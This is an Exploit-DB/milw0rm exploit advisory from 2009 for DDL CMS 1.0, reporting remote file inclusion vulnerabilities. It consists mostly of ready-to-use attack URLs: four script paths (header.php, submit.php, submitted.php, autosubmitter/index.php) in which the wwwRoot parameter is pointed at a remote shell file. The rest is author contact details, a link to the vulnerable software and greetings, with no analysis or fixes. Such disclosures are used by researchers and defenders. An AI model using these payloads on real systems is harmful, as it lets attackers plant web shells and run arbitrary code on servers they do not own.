DDL CMS 1.0 - Multiple Remote File Inclusions

EDB-ID:

9722

Author:

HxH

Type:

webapps

Platform:

Multiple

Published:

2009-09-21

+============================================================+
|                                                            |
| DDL CMS 1.0 Multiple Remote File Inclusion Vulnerabilities |
|                                                            |
+============================================================+
|                                                            |
| Author : HxH                                               |
|                                                            |
| E-Mail : HxH[at]live[dot]at                                |
|                                                            |
+------------------------------------------------------------+
|                                                            |
| Script : http://www.ddlcms.com/DDLCMS_v1.0.zip             |
|                                                            |
+------------------------------------------------------------+
|                                                            |
| Exploit :                                                  |
|                                                            |
| /header.php?wwwRoot=[Shell.txt?]                           |
|                                                            |
| /submit.php?wwwRoot=[Shell.txt?]                           |
|                                                            |
| /submitted.php?wwwRoot=[Shell.txt?]                        |
|                                                            |
| /autosubmitter/index.php?wwwRoot=[Shell.txt?]              |
|                                                            |
+============================================================+
|                                                            |
| Greetz : ~ JiKo ~ ThE X ~ TSH ~ All No-Exploit.com Members |
|                                                            |
+============================================================+

# milw0rm.com [2009-09-21]